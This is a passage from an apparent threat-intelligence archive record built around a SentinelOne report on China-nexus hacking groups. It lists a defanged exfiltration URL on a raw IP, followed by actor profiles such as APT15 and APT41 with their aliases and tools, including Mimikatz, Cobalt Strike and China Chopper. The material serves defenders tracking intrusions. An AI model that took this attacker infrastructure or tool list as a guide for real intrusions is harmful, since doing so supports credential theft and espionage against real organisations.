server\r\nURLs\r\nValue Note\r\nhttps[://]45.13.199[.]209/rss/rss.php Exfiltration URL\r\nSource: https://www.sentinelone.com/labs/follow-the-smoke-china-nexus-threat-actors-hammer-at-the-doors-of-top-tier-targets/\r\nhttps://www.sentinelone.com/labs/follow-the-smoke-china-nexus-threat-actors-hammer-at-the-doors-of-top-tier-targets/\r\nPage 18 of 18", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "ETDA" ], "origins": [ "web" ], "references": [ "https://www.sentinelone.com/labs/follow-the-smoke-china-nexus-threat-actors-hammer-at-the-doors-of-top-tier-targets/" ], "report_names": [ "follow-the-smoke-china-nexus-threat-actors-hammer-at-the-doors-of-top-tier-targets" ], "threat_actors": [ { "id": "0a03e7f0-2f75-4153-9c4f-c46d12d3962e", "created_at": "2022-10-25T15:50:23.453824Z", "updated_at": "2026-04-10T02:00:05.28793Z", "deleted_at": null, "main_name": "Ke3chang", "aliases": [ "Ke3chang", "APT15", "Vixen Panda", "GREF", "Playful Dragon", "RoyalAPT", "Nylon Typhoon" ], "source_name": "MITRE:Ke3chang", "tools": [ "Okrum", "Systeminfo", "netstat", "spwebmember", "Mimikatz", "Tasklist", "MirageFox", "Neoichor", "ipconfig" ], "source_id": "MITRE", "reports": null }, { "id": "b302cfdb-30c9-4dce-a968-d2398dda820d", "created_at": "2024-03-28T02:00:05.789775Z", "updated_at": "2026-04-10T02:00:03.611467Z", "deleted_at": null, "main_name": "UNC5174", "aliases": [ "Uteus" ], "source_name": "MISPGALAXY:UNC5174", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "4d5f939b-aea9-4a0e-8bff-003079a261ea", "created_at": "2023-01-06T13:46:39.04841Z", "updated_at": "2026-04-10T02:00:03.196806Z", "deleted_at": null, "main_name": "APT41", "aliases": [ "WICKED PANDA", "BRONZE EXPORT", "Brass Typhoon", "TG-2633", "Leopard Typhoon", "G0096", "Grayfly", "BARIUM", "BRONZE ATLAS", "Red Kelpie", "G0044", "Earth Baku", "TA415", "WICKED SPIDER", "HOODOO", "Winnti", "Double Dragon" ], "source_name": "MISPGALAXY:APT41", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "f5339d7c-473e-4b49-b44c-189b4f72b585", "created_at": "2024-12-28T02:01:54.8259Z", "updated_at": "2026-04-10T02:00:04.778045Z", "deleted_at": null, "main_name": "Mysterious Elephant", "aliases": [ "APT-K-47" ], "source_name": "ETDA:Mysterious Elephant", "tools": [ "ORPCBackdoor" ], "source_id": "ETDA", "reports": null }, { "id": "e698860d-57e8-4780-b7c3-41e5a8314ec0", "created_at": "2022-10-25T15:50:23.287929Z", "updated_at": "2026-04-10T02:00:05.329769Z", "deleted_at": null, "main_name": "APT41", "aliases": [ "APT41", "Wicked Panda", "Brass Typhoon", "BARIUM" ], "source_name": "MITRE:APT41", "tools": [ "ASPXSpy", "BITSAdmin", "PlugX", "Impacket", "gh0st RAT", "netstat", "PowerSploit", "ZxShell", "KEYPLUG", "LightSpy", "ipconfig", "sqlmap", "China Chopper", "ShadowPad", "MESSAGETAP", "Mimikatz", "certutil", "njRAT", "Cobalt Strike", "pwdump", "BLACKCOFFEE", "MOPSLED", "ROCKBOOT", "dsquery", "Winnti for Linux", "DUSTTRAP", "Derusbi", "ftp" ], "source_id": "MITRE", "reports": null }, { "id": "0ae281f0-886a-46ab-b413-e2db5c0f3142", "created_at": "2025-05-29T02:00:03.217545Z", "updated_at": "2026-04-10T02:00:03.869082Z", "deleted_at": null, "main_name": "PurpleHaze", "aliases": [], "source_name": "MISPGALAXY:PurpleHaze", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "2a24d664-6a72-4b4c-9f54-1553b64c453c", "created_at": "2025-08-07T02:03:24.553048Z", "updated_at": "2026-04-10T02:00:03.787296Z", "deleted_at": null, "main_name": "BRONZE ATLAS", "aliases": [ "APT41 ", "BARIUM ", "Blackfly ", "Brass Typhoon", "CTG-2633", "Earth Baku ", "GREF", "Group 72 ", "Red Kelpie ", "TA415 ", "TG-2633 ", "Wicked Panda ", "Winnti" ], "source_name": "Secureworks:BRONZE ATLAS", "tools": [ "Acehash", "CCleaner v5.33 backdoor", "ChinaChopper", "Cobalt Strike", "DUSTPAN", "Dicey MSDN", "Dodgebox", "ForkPlayground", "HUC Proxy Malware (Htran)" ], "source_id": "Secureworks", "reports": null }, { "id": "8bcbeb8a-111b-4ea1-a72b-5c7abd8ef132", "created_at": "2025-11-01T02:04:53.050049Z", "updated_at": "2026-04-10T02:00:03.774442Z", "deleted_at": null, "main_name": "BRONZE SNOWDROP", "aliases": [ "UNC5174 " ], "source_name": "Secureworks:BRONZE SNOWDROP", "tools": [ "Metasploit", "SNOWLIGHT", "SUPERSHELL", "Sliver", "VShell" ], "source_id": "Secureworks", "reports": null }, { "id": "7d5531e2-0ad1-4237-beed-af009035576f", "created_at": "2024-05-01T02:03:07.977868Z", "updated_at": "2026-04-10T02:00:03.817883Z", "deleted_at": null, "main_name": "BRONZE PALACE", "aliases": [ "APT15 ", "BRONZE DAVENPORT ", "BRONZE IDLEWOOD ", "CTG-6119 ", "CTG-6119 ", "CTG-9246 ", "Ke3chang ", "NICKEL ", "Nylon Typhoon ", "Playful Dragon", "Vixen Panda " ], "source_name": "Secureworks:BRONZE PALACE", "tools": [ "BMW", "BS2005", "Enfal", "Mirage", "RoyalCLI", "RoyalDNS" ], "source_id": "Secureworks", "reports": null }, { "id": "7c8cf02c-623a-4793-918b-f908675a1aef", "created_at": "2023-01-06T13:46:38.309165Z", "updated_at": "2026-04-10T02:00:02.921721Z", "deleted_at": null, "main_name": "APT15", "aliases": [ "Metushy", "Lurid", "Social Network Team", "Royal APT", "BRONZE DAVENPORT", "BRONZE IDLEWOOD", "VIXEN PANDA", "Ke3Chang", "Playful Dragon", "BRONZE PALACE", "G0004", "Red Vulture", "Nylon Typhoon" ], "source_name": "MISPGALAXY:APT15", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "17b1b76b-16da-4c4f-8b32-f6fede3eda8c", "created_at": "2022-10-25T16:07:23.750796Z", "updated_at": "2026-04-10T02:00:04.736762Z", "deleted_at": null, "main_name": "Ke3chang", "aliases": [ "APT 15", "BackdoorDiplomacy", "Bronze Davenport", "Bronze Idlewood", "Bronze Palace", "CTG-9246", "G0004", "G0135", "GREF", "Ke3chang", "Metushy", "Nylon Typhoon", "Operation Ke3chang", "Operation MirageFox", "Playful Dragon", "Playful Taurus", "PurpleHaze", "Red Vulture", "Royal APT", "Social Network Team", "Vixen Panda" ], "source_name": "ETDA:Ke3chang", "tools": [ "Agentemis", "Anserin", "BS2005", "BleDoor", "CarbonSteal", "Cobalt Strike", "CobaltStrike", "DarthPusher", "DoubleAgent", "EternalBlue", "GoldenEagle", "Graphican", "HenBox", "HighNoon", "IRAFAU", "Ketrican", "Ketrum", "LOLBAS", "LOLBins", "Living off the Land", "MS Exchange Tool", "Mebroot", "Mimikatz", "MirageFox", "NBTscan", "Okrum", "PluginPhantom", "PortQry", "ProcDump", "PsList", "Quarian", "RbDoor", "RibDoor", "Royal DNS", "RoyalCli", "RoyalDNS", "SAMRID", "SMBTouch", "SilkBean", "Sinowal", "SpyWaller", "Theola", "TidePool", "Torpig", "Turian", "Winnti", "XSLCmd", "cobeacon", "nbtscan", "netcat", "spwebmember" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434004, "ts_updated_at": 1775826745, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/d2b4b96425502cfbec3335386b42dd1860650e47.pdf", "text": "https://archive.orkl.eu/d2b4b96425502cfbec3335386b42dd1860650e47.txt", "img": "https://archive.orkl.eu/d2b4b96425502cfbec3335386b42dd1860650e47.jpg" } }